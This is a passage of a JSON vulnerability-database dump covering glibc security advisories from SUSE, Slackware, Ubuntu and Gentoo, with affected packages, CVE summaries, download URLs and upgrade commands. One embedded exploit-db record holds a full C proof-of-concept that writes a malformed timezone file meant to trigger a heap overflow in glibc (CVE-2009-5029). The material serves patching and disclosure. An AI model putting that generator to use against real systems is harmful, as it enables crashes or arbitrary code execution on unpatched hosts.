"arch": "i586", "packageFilename": "glibc-i18ndata-2.9-13.11.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-html-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.9-2.13.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i686", "packageFilename": "glibc-2.11.1-0.20.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "s390x", "packageFilename": "glibc-html-2.4-31.77.76.1.s390x.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ppc64", "packageFilename": "glibc-2.11.1-0.20.1.ppc64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "i686", "packageFilename": "glibc-2.10.1-10.9.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ppc", "packageFilename": "glibc-profile-2.4-31.77.76.1.ppc.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ia64", "packageFilename": "glibc-2.4-31.77.76.1.ia64.rpm", "packageName": "glibc", "operator": "lt"}], "description": "The Linux C library glibc was updated to fix critical security issues and several bugs:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "reporter": "Suse", "published": "2010-10-28T13:41:00", "title": "local privilege escalation in glibc", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2942", "CVE-2010-3078", "CVE-2010-3297", "CVE-2010-0015", "CVE-2010-2955", "CVE-2010-2946", "CVE-2010-0296", "CVE-2010-3310", "CVE-2010-3296", "CVE-2010-0830", "CVE-2010-3015", "CVE-2010-2954", "CVE-2010-3856", "CVE-2010-2803", "CVE-2010-3847", "CVE-2010-2798", "CVE-2008-1391", "CVE-2010-3080"], "modified": "2010-10-28T13:41:00", "id": "SUSE-SA:2010:052", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-10/msg00007.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2018-08-31T00:36:48", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.11.1", "arch": "i486", "packageFilename": "glibc-profile-2.11.1-i486-6_slack13.1.txz", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "2.13", "arch": "x86_64", "packageFilename": "glibc-profile-2.13-x86_64-5_slack13.37.txz", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "2.13", "arch": "i486", "packageFilename": "glibc-profile-2.13-i486-5_slack13.37.txz", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.11.1", "arch": "x86_64", "packageFilename": "glibc-2.11.1-x86_64-6_slack13.1.txz", "packageName": "glibc", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.11.1", "arch": "i486", "packageFilename": "glibc-i18n-2.11.1-i486-6_slack13.1.txz", "packageName": "glibc-i18n", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "2.13", "arch": "i486", "packageFilename": "glibc-i18n-2.13-i486-5_slack13.37.txz", "packageName": "glibc-i18n", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "2.13", "arch": "x86_64", "packageFilename": "glibc-i18n-2.13-x86_64-5_slack13.37.txz", "packageName": "glibc-i18n", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.11.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.11.1-x86_64-6_slack13.1.txz", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.11.1", "arch": "i486", "packageFilename": "glibc-2.11.1-i486-6_slack13.1.txz", "packageName": "glibc", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "2.13", "arch": "i486", "packageFilename": "glibc-2.13-i486-5_slack13.37.txz", "packageName": "glibc", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "2.13", "arch": "x86_64", "packageFilename": "glibc-solibs-2.13-x86_64-5_slack13.37.txz", "packageName": "glibc-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "2.13", "arch": "i486", "packageFilename": "glibc-solibs-2.13-i486-5_slack13.37.txz", "packageName": "glibc-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "2.13", "arch": "x86_64", "packageFilename": "glibc-2.13-x86_64-5_slack13.37.txz", "packageName": "glibc", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "2.13", "arch": "noarch", "packageFilename": "glibc-zoneinfo-2.13-noarch-5_slack13.37.txz", "packageName": "glibc-zoneinfo", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "2.13", "arch": "noarch", "packageFilename": "glibc-zoneinfo-2.13-noarch-5_slack13.37.txz", "packageName": "glibc-zoneinfo", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.11.1", "arch": "noarch", "packageFilename": "glibc-zoneinfo-2.11.1-noarch-6_slack13.1.txz", "packageName": "glibc-zoneinfo", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.11.1", "arch": "noarch", "packageFilename": "glibc-zoneinfo-2.11.1-noarch-6_slack13.1.txz", "packageName": "glibc-zoneinfo", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.11.1", "arch": "i486", "packageFilename": "glibc-solibs-2.11.1-i486-6_slack13.1.txz", "packageName": "glibc-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.11.1", "arch": "x86_64", "packageFilename": "glibc-i18n-2.11.1-x86_64-6_slack13.1.txz", "packageName": "glibc-i18n", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.11.1", "arch": "x86_64", "packageFilename": "glibc-solibs-2.11.1-x86_64-6_slack13.1.txz", "packageName": "glibc-solibs", "operator": "lt"}], "description": "New glibc packages are available for Slackware 13.1, 13.37, and -current to\nfix a security issue.\n\n\nHere are the details from the Slackware 13.37 ChangeLog:\n\npatches/packages/glibc-2.13-i486-5_slack13.37.txz: Rebuilt.\n Patched an overflow in tzfile. This was evidently first reported in\n 2009, but is only now getting around to being patched. To exploit it,\n one must be able to write beneath /usr/share/zoneinfo, which is usually\n not possible for a normal user, but may be in the case where they are\n chroot()ed to a directory that they own.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5029\n (* Security fix *)\npatches/packages/glibc-i18n-2.13-i486-5_slack13.37.txz: Rebuilt.\npatches/packages/glibc-profile-2.13-i486-5_slack13.37.txz: Rebuilt.\n (* Security fix *)\npatches/packages/glibc-solibs-2.13-i486-5_slack13.37.txz: Rebuilt.\n (* Security fix *)\npatches/packages/glibc-zoneinfo-2.13-noarch-5_slack13.37.txz: Rebuilt.\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-2.11.1-i486-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-i18n-2.11.1-i486-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-profile-2.11.1-i486-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-solibs-2.11.1-i486-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-zoneinfo-2.11.1-noarch-6_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-2.11.1-x86_64-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-i18n-2.11.1-x86_64-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-profile-2.11.1-x86_64-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-solibs-2.11.1-x86_64-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-zoneinfo-2.11.1-noarch-6_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-2.13-i486-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-i18n-2.13-i486-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-profile-2.13-i486-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-solibs-2.13-i486-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-zoneinfo-2.13-noarch-5_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-2.13-x86_64-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-i18n-2.13-x86_64-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-profile-2.13-x86_64-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-solibs-2.13-x86_64-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-zoneinfo-2.13-noarch-5_slack13.37.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-solibs-2.14.1-i486-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-zoneinfo-2011i_2011n-noarch-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-2.14.1-i486-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-i18n-2.14.1-i486-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-profile-2.14.1-i486-4.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-solibs-2.14.1-x86_64-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-zoneinfo-2011i_2011n-noarch-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-2.14.1-x86_64-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-i18n-2.14.1-x86_64-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-profile-2.14.1-x86_64-4.txz\n\n\nMD5 signatures:\n\nSlackware 13.1 packages:\nc7f0d5af7b32d6259272956bf1621ce0 glibc-2.11.1-i486-6_slack13.1.txz\nd80c53f769a30b407e303eb440e326e3 glibc-i18n-2.11.1-i486-6_slack13.1.txz\n6b9eb872a8368a13d71cecf8e031d2be glibc-profile-2.11.1-i486-6_slack13.1.txz\nba34c30c27d42c61190979884e8b8697 glibc-solibs-2.11.1-i486-6_slack13.1.txz\n74afbffcfb20ac6235945930a8a0ac57 glibc-zoneinfo-2.11.1-noarch-6_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\na9bfcb4a0fde94a9355ecce905bb3ba4 glibc-2.11.1-x86_64-6_slack13.1.txz\n6f7df8a5ac48f364fff364f679430ea5 glibc-i18n-2.11.1-x86_64-6_slack13.1.txz\n1590ae7b50153b2d28489b9192126120 glibc-profile-2.11.1-x86_64-6_slack13.1.txz\n067bcd52acc3552bf2a77126fd12605e glibc-solibs-2.11.1-x86_64-6_slack13.1.txz\nce56ec387a50c00425d4dcf88ba71ee2 glibc-zoneinfo-2.11.1-noarch-6_slack13.1.txz\n\nSlackware 13.37 packages:\ndacaa396b83346f0313e85356ba496ad glibc-2.13-i486-5_slack13.37.txz\ne6238c92c6a97a56274d91e342e2ef07 glibc-i18n-2.13-i486-5_slack13.37.txz\naca444c2c834c1bbbb1fdcd08f381f5d glibc-profile-2.13-i486-5_slack13.37.txz\n04db99e0770b06af713322daa35f9463 glibc-solibs-2.13-i486-5_slack13.37.txz\nfe22b8ba56e8a14d025943d6a53f0a22 glibc-zoneinfo-2.13-noarch-5_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\nab90f9581621a4b9e1f41fdd1c583a25 glibc-2.13-x86_64-5_slack13.37.txz\nd82fef5b1e734c9fd9aee358139dccaa glibc-i18n-2.13-x86_64-5_slack13.37.txz\nf26848e2ef7a2ed367a73fded8d51e2a glibc-profile-2.13-x86_64-5_slack13.37.txz\n1f4b8e716764c98c7c261fb7d7c19557 glibc-solibs-2.13-x86_64-5_slack13.37.txz\n553c32ce3937c8700dde84bad4b5467c glibc-zoneinfo-2.13-noarch-5_slack13.37.txz\n\nSlackware -current packages:\ncc98a5b0a120a3350b17d087af3a2163 a/glibc-solibs-2.14.1-i486-4.txz\nb549864a76c55b71f385eaf9077cf6ac a/glibc-zoneinfo-2011i_2011n-noarch-4.txz\n8522cbc56aec9af6c9c8e58fb5ee71c4 l/glibc-2.14.1-i486-4.txz\n98561de06536ce17b221774f39316933 l/glibc-i18n-2.14.1-i486-4.txz\n8a7ac4e4796eaefc6447222f7ce6eedf l/glibc-profile-2.14.1-i486-4.txz\n\nSlackware x86_64 -current packages:\n83121e8a4e8e46d2faa58221382f914c a/glibc-solibs-2.14.1-x86_64-4.txz\n8245bc6fb5e59fa905df708391bd3f89 a/glibc-zoneinfo-2011i_2011n-noarch-4.txz\nca3c22ff543e900bfd4516ba4af7cf34 l/glibc-2.14.1-x86_64-4.txz\ne2650c24a1a69138f544e98d8653f2a9 l/glibc-i18n-2.14.1-x86_64-4.txz\n23c2f013552e8a0561168897866fcb53 l/glibc-profile-2.14.1-x86_64-4.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg glibc-2.13-i486-5_slack13.37.txz glibc-i18n-2.13-i486-5_slack13.37.txz glibc-profile-2.13-i486-5_slack13.37.txz glibc-solibs-2.13-i486-5_slack13.37.txz glibc-zoneinfo-2.13-noarch-5_slack13.37.txz", "edition": 3, "reporter": "Slackware Linux Project", "published": "2012-02-10T09:44:30", "title": "glibc", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "modified": "2012-02-10T09:44:30", "id": "SSA-2012-041-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2012&m=slackware-security.806982", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-04T03:26:33", "osvdbidlist": ["77508"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability. CVE-2009-5029. Dos exploit for linux platform", "reporter": "dividead", "published": "2009-06-01T00:00:00", "type": "exploitdb", "title": "GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-5029"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2009-06-01T00:00:00", "id": "EDB-ID:36404", "href": "https://www.exploit-db.com/exploits/36404/", "sourceData": "source: http://www.securityfocus.com/bid/50898/info\r\n\r\nGNU glibc is prone to an remote integer-overflow vulnerability.\r\n\r\nAn attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that uses the affected library. \r\n\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n#include <string.h>\r\n \r\n#define TZ_MAGIC \"TZif\"\r\n \r\n#define PUT_32BIT_MSB(cp, value) \\\r\n do { \\\r\n (cp)[0] = (value) >> 24; \\\r\n (cp)[1] = (value) >> 16; \\\r\n (cp)[2] = (value) >> 8; \\\r\n (cp)[3] = (value); \\\r\n } while (0)\r\n \r\nstruct tzhead {\r\n char tzh_magic[4];\r\n char tzh_version[1];\r\n char tzh_reserved[15];\r\n char tzh_ttisgmtcnt[4];\r\n char tzh_ttisstdcnt[4];\r\n char tzh_leapcnt[4];\r\n char tzh_timecnt[4];\r\n char tzh_typecnt[4];\r\n char tzh_charcnt[4];\r\n};\r\n \r\nstruct ttinfo\r\n {\r\n long int offset;\r\n unsigned char isdst;\r\n unsigned char idx;\r\n unsigned char isstd;\r\n unsigned char isgmt;\r\n };\r\nint main(void)\r\n{\r\n struct tzhead evil;\r\n int i;\r\n char *p;\r\n42\r\n uint32_t total_size;\r\n uint32_t evil1, evil2;\r\n \r\n /* Initialize static part of the header */\r\n memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1);\r\n evil.tzh_version[0] = 0;\r\n memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved));\r\n memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt));\r\n memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt));\r\n memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt));\r\n memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt));\r\n \r\n /* Initialize nasty part of the header */\r\n evil1 = 500;\r\n PUT_32BIT_MSB(evil.tzh_timecnt, evil1);\r\n \r\n total_size = evil1 * (sizeof(time_t) + 1);\r\n total_size = ((total_size + __alignof__ (struct ttinfo) - 1)\r\n & ~(__alignof__ (struct ttinfo) - 1));\r\n \r\n /* value of chars, to get a malloc(0) */\r\n evil2 = 0 - total_size;\r\n PUT_32BIT_MSB(evil.tzh_charcnt, evil2);\r\n p = (char *)&evil;\r\n for (i = 0; i < sizeof(evil); i++)\r\n printf(\"%c\", p[i]);\r\n \r\n /* data we overflow with */\r\n for (i = 0; i < 50000; i++)\r\n printf(\"A\");\r\n}\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/36404/"}], "ubuntu": [{"lastseen": "2018-08-31T00:09:00", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0864", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-2702", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0015", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-1071", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-4609", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-5029", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-1659", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-1658", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-1089", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-1095"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "2.12.1-0ubuntu10.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libc6", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.11.1-0ubuntu7.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libc-bin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.11.1-0ubuntu7.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libc6", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "2.12.1-0ubuntu10.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libc-bin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.7-10ubuntu8.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libc6", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "2.13-0ubuntu13.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libc6", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "2.13-20ubuntu5.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libc6", "operator": "lt"}], "description": "It was discovered that the GNU C Library did not properly handle integer overflows in the timezone handling code. An attacker could use this to possibly execute arbitrary code by convincing an application to load a maliciously constructed tzfile. (CVE-2009-5029)\n\nIt was discovered that the GNU C Library did not properly handle passwd.adjunct.byname map entries in the Network Information Service (NIS) code in the name service caching daemon (nscd). An attacker could use this to obtain the encrypted passwords of NIS accounts. This issue only affected Ubuntu 8.04 LTS. (CVE-2010-0015)\n\nChris Evans reported that the GNU C Library did not properly calculate the amount of memory to allocate in the fnmatch() code. An attacker could use this to cause a denial of service or possibly execute arbitrary code via a maliciously crafted UTF-8 string. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu 10.10. (CVE-2011-1071)\n\nTomas Hoger reported that an additional integer overflow was possible in the GNU C Library fnmatch() code. An attacker could use this to cause a denial of service via a maliciously crafted UTF-8 string. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1659)\n\nDan Rosenberg discovered that the addmntent() function in the GNU C Library did not report an error status for failed attempts to write to the /etc/mtab file. This could allow an attacker to corrupt /etc/mtab, possibly causing a denial of service or otherwise manipulate mount options. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1089)\n\nHarald van Dijk discovered that the locale program included with the GNU C library did not properly quote its output. This could allow a local attacker to possibly execute arbitrary code using a crafted localization string that was evaluated in a shell script. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu 10.10. (CVE-2011-1095)\n\nIt was discovered that the GNU C library loader expanded the $ORIGIN dynamic string token when RPATH is composed entirely of this token. This could allow an attacker to gain privilege via a setuid program that had this RPATH value. (CVE-2011-1658)\n\nIt was discovered that the GNU C library implementation of memcpy optimized for Supplemental Streaming SIMD Extensions 3 (SSSE3) contained a possible integer overflow. An attacker could use this to cause a denial of service or possibly execute arbitrary code. This issue only affected Ubuntu 10.04 LTS. (CVE-2011-2702)\n\nJohn Zimmerman discovered that the Remote Procedure Call (RPC) implementation in the GNU C Library did not properly handle large numbers of connections. This could allow a remote attacker to cause a denial of service. (CVE-2011-4609)\n\nIt was discovered that the GNU C Library vfprintf() implementation contained a possible integer overflow in the format string protection code offered by FORTIFY_SOURCE. An attacker could use this flaw in conjunction with a format string vulnerability to bypass the format string protection and possibly execute arbitrary code. (CVE-2012-0864)", "edition": 3, "reporter": "Ubuntu", "published": "2012-03-09T00:00:00", "title": "GNU C Library vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2010-0015", "CVE-2011-4609", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-2702", "CVE-2011-1089"], "modified": "2012-03-09T00:00:00", "id": "USN-1396-1", "href": "https://usn.ubuntu.com/1396-1/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-09T00:18:50", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0830", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0296", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-1391"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.3.6-0ubuntu20.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libc6", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.10.1-0ubuntu17", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libc6", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "2.9-4ubuntu6.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libc6", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.11.1-0ubuntu7.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libc6", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.7-10ubuntu6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libc6", "operator": "lt"}], "description": "Maksymilian Arciemowicz discovered that the GNU C library did not correctly handle integer overflows in the strfmon function. If a user or automated system were tricked into processing a specially crafted format string, a remote attacker could crash applications, leading to a denial of service. (Ubuntu 10.04 was not affected.) (CVE-2008-1391)\n\nJeff Layton and Dan Rosenberg discovered that the GNU C library did not correctly handle newlines in the mntent family of functions. If a local attacker were able to inject newlines into a mount entry through other vulnerable mount helpers, they could disrupt the system or possibly gain root privileges. (CVE-2010-0296)\n\nDan Rosenberg discovered that the GNU C library did not correctly validate certain ELF program headers. If a user or automated system were tricked into verifying a specially crafted ELF program, a remote attacker could execute arbitrary code with user privileges. (CVE-2010-0830)", "edition": 5, "reporter": "Ubuntu", "published": "2010-05-25T00:00:00", "title": "GNU C Library vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "modified": "2010-05-25T00:00:00", "id": "USN-944-1", "href": "https://usn.ubuntu.com/944-1/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:23", "references": ["https://bugs.gentoo.org/show_bug.cgi?id=386333", "https://bugs.gentoo.org/show_bug.cgi?id=386343", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1071", "https://bugs.gentoo.org/show_bug.cgi?id=404993", "https://bugs.gentoo.org/show_bug.cgi?id=393477", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1659", "https://bugs.gentoo.org/show_bug.cgi?id=386349", "https://bugs.gentoo.org/show_bug.cgi?id=356567", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3847", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1658", "https://bugs.gentoo.org/show_bug.cgi?id=350744", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-5029", "https://bugs.gentoo.org/show_bug.cgi?id=386329", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1089", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0864", "https://bugs.gentoo.org/show_bug.cgi?id=386323", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0536", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1095", "https://bugs.gentoo.org/show_bug.cgi?id=386327"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.15-r3", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "sys-libs/glibc", "operator": "lt"}], "edition": 1, "description": "### Background\n\nThe GNU C library is the standard C library used by Gentoo Linux systems. \n\n### Description\n\nMultiple vulnerabilities have been discovered in GNU C Library. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA local attacker could trigger vulnerabilities in dynamic library loader, making it possible to load attacker-controlled shared objects during execution of setuid/setgid programs to escalate privileges. \n\nA context-dependent attacker could trigger various vulnerabilities in GNU C Library, including a buffer overflow, leading to execution of arbitrary code or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll GNU C Library users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-libs/glibc-2.15-r3\"", "reporter": 